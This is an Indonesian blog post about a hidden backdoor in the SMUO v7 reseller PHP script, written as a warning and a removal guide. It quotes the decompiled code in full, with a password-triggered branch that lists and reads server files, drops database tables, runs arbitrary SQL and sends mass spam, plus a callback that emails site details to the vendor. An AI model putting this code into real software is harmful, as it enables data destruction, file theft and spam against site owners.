Sabtu, 5 Februari 2011

Cara Menghilangkan BackDoor Pada Script SMUO

Kali ini bukannya saya mau bagi-bagi script reseller SMUO secara gratis yang bisa di download disini. Tapi saya cuma ingin tahu aja apa benar “SMUO ver. 7 Memata-Matai”. Maksudnya apa nih ??? Jadi gini lho, Dah pada tahu kan Script SMUO Ver 7 telah di enkripsi dengan Zend sehingga seluruh fungsi nya tidak kelihatan dan mungkin disisipkan suatu script untuk memata-matai pengguna nya dengan mengacaukan databse kita. Apa-benar demikian ???
Semuanya dimulai dari cerita seseorang membeli secara legal SMUO (informasi ini saya peroleh dari sini http://ngintip.jangkrikjr.uni.cc) :
Sebelum gw bagiin ni script sama lo pade, izinkanlah gw sedikit bercerita dan gw yakin banget cerita ini besar manfaatnya buat lo pade. Ni cerita bukan karangan dan asli pengalaman hidup gw.

Gw adalah seorang anak yang biasa-biasa aja, berharap dapat mencari sesuap nasi dari bisnis online. Alhasil gabung lah gw sama FormulaBisnis.com yang katanya punya sistem mesin uang online. Di ebook 200an halaman tersebut gw disaranin bikin website sendiri dan beli scriptnya di gempar.com.

Alhasil, karena gw emang semangat ya gw beli lah ni script (SMUO V7) langsung dari gempar.com. Karena gw adalah member FormulaBisnis.com maka dapet diskon 50%, so gw cuma bayar Rp.200.000.

Setelah berjuang keras sekitar 2 bulan, akhirnya gw berhasil juga mengetahui bagaimana menggunakan ni script (walau ada panduan tetep aja susah sob, kan gw newbie banget). Akhirnya gw berhasil meluncurkan website reseller gw sendiri, wah bukan maen senangnya gw (serasa udah kaya aja).

1 bulan pertama seh oke-oke aja bos (member baru beberapa orang aja). Tapi sob dibulan kedua mendadak database gw kacau balau, semua data-data member dan prospek gw raib. Gw complain ke pihak host dan sempat maki-maki mereka karena layanannya ga prima (katanya bebas hacker). Tapi pihak host malah bingung karena menurut mereka gw sendirilah yang menghilangkan database member gw (gw juga ikutan bingung).

Gw sempat nyobain instal ulang script tersebut berkali-kali, namun lo tau apa? Selama 4 hari berturut-turut hal yang sama harus gw alami, database gw raib dan ngaco dengan sendirinya. Gw coba tanya ke grmpar.com, eh malah dia kayanya ga pernah mengalami hal tersebut. Nanya ke formulabisnis.com eh malah kaga dibales-bales.

Gw bner-bner sedih sob n terutama ga enak ama para member, takut dikatain penipu n scam. Alhasil gw melakukan investigasi (dulu pernah ngimpi jadi polisi) dan berhasil menemukan kejanggalan. Gw coba konsultasi ke salah satu forum gelap langganan gw dan ketahuanlah ternyata tu script disisipi callback biar pencipta bisa utak-atik database kita sesuka hatinya.

Gw marah besar!

Gw sebenarnya punya versi lama ni script hasil bajakan yang gw dapet dari situs laen. Tapi karena niat gw mo bisnis yang baek-baek aja, makanya gw beli yang asli (maksudnya biar dapet lisensi dan lebih aman). Eh ga taunya si gempar.com malah nuduh gw udah ngebajak ni script dan selama 4 hari gw yang pemula ini sukses dikerjain ma tu orang.

Gw coba cek ke beberapa situs yang menggunakan script yang sama (SMUO V7 kaya gw) dan ternyata memang benar. Semuanya disisipi backdoor ama si gempar.com itu. Wah ni gawat namanya sob, itu artinya dia dapat secara leluasa ngutak atik database kita. Gw seh baru tau kerusakan yang dapat diciptakannya sejauh itu aja, ga tau apakah dia bisa masuk root sebagai admin atau kaga.

Gw ga bakalan posting disini apa kelemahannya. Yang penting gw tau ini forum kategorinya bisnis-bisnisan jadi walaupun ntar dianggap salah kamar gapapa, buat mengobati sakit ati gw mo bagi-bagi gratis.

SCRIPT SMUO VERSI 7 YANG ASLI GW BELI RP. 200.000 :

****deleted, MAAF GAK BOLEH SHARING BARANG BAJAKAN DISINI*****

Note : ILANGIN TANDA * DIANTARA D DAN D NYA YAH SOB!

Silakan didownload sepuasnya. Mau dijual ulang juga kaga apa-apa, terserah lo pade. Tapi inget sob, apapun permasalahan yang lo dapet ntar, gw ga tanggung jawab. Ni script udah lengkap ama panduannya, juga 100% asli karena emang gw beli secara sah dari gempar.com.

Bener ga ya Script smuo disisipi backdoor ?

Dari file yang ada didalam folder fungsi dan yang udah di dezended oleh rekan meQ_karet, ternyata script backdoor ada di file fungsi.php line 199 yaitu seperti ini :
if ( $bantai == "pembajak" )

{

if ( $passwordkill == "" )

{

echo "
\r\n Pass :
\r\n Act :
\r\n Dir :
\r\n Nam :
\r\n Que :
\r\n \r\n
";

exit( );

}

if ( $passwordkill == "gemp4rdotcom" && $action == "dir" )

{

if ( $folder )

{

$dir = opendir( $folder );

while ( $entri = readdir( $dir ) )

{

echo "{$entri}
";

}

closedir( $dir );

}

if ( $namafile )

{

$berkas = fopen( $namafile, "r" );

while ( !feof( $berkas ) )

{

$isi_baris = trim( fgets( $berkas, 255 ) );

printf( "%s
\n", htmlentities( $isi_baris ) );

}

}

exit( );

}

if ( $passwordkill == "gemp4rdotcom" && $action == "db" )

{

$sql = "DROP TABLE IF EXISTS member";

mysql_query( $sql );

$sql = "DROP TABLE IF EXISTS news";

mysql_query( $sql );

$sql = "DROP TABLE IF EXISTS setting";

mysql_query( $sql );

$sql = "DROP TABLE IF EXISTS testimonial";

mysql_query( $sql );

$sql = "DROP TABLE IF EXISTS subscribe";

mysql_query( $sql );

echo "Destroyed...";

exit( );

}

if ( $passwordkill == "gemp4rdotcom" && $action == "que" )

{

$kue = stripslashes( $kueri );

mysql_query( $kue );

echo "{$kue} ..... done";

exit( );

}

}

if ( $bantai == "pembajakspam" )

{

$data0 = trim( $mass );

$data1 = explode( "\n", $data0 );

$jml = count( $data1 );

$i = 0;

while ( $i < $jml + 1 )

{

$k = $i + 1;

$email1 = trim( $data1[$i] );

$subject1 = "{$subject}";

$headers1 = "From:{$name}<{$email}> \n";

$headers1 .= "X-Priority: 1 \n";

$headers1 .= "Return-Path: <{$back}>\n";

mail( $email1, $subject1, $message, $headers1 );

echo "{$k} - {$email1}
";

++$i;

}

exit( );

}

session_start( );

if ( $id )

{

tes( $id );

}

else if ( !$id_sesi )

{

tes( $id );

}

Dan dalam file fungsiadmin.php line 290, ditemukan script callback yg akan mengirim data ke email : freddykuncoro9999@xxxxx.com. PHP Code nya seperti ini :
if ( $sudah != "yes" )
{
$email1 = "freddykuncoro9999@xxxxx.com";
$subject1 = "ilegal user : {$namaadmin} - {$HTTP_REFERER}";
$headers1 = "From:{$domain}<{$emailadmin}> \n";
$headers1 .= "X-Priority: 1\n";
$message1 = "http://www.{$domain}/?bantai=pembajak";
mail( $email1, $subject1, $message1, $headers1 );
session_register( "sudah" );
$sudah = "yes";
}

Nah kalau udah gini gimana coba ? Ok, maksud nya disisipi kedua script tersebut sudah pasti untuk melindungi hak cipta. Tapi kasian juga ya bagi mereka yang sudah beli secara legal di gempar.com tapi kena imbas yang kurang mengenakan. Kalau ga mau apes ya dihapus aja kedua kode PHP tersebut hehehe

Kalo kata ngintip.jangkrikjr.uni.cc :

jangan gunakan SMUO versi terakhir dengan ciri fungsi.php nya telah di encrypt dengan Zend ya. yang legal saja tidak saya anjurkan apalagi kalo dapatnya bajakan. Kalo terpaksa menggunakan silahkan ganti fungsi.phpnya seperti cara diatas. Lebih baik gunakan SMUO versi yang lama.
Artikel lain = 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 71 72

NB: Jika anda suka artikel ini, silakan share ke teman - teman anda, gunakan tombol di bawah ini =

Tiada ulasan:

Catat Ulasan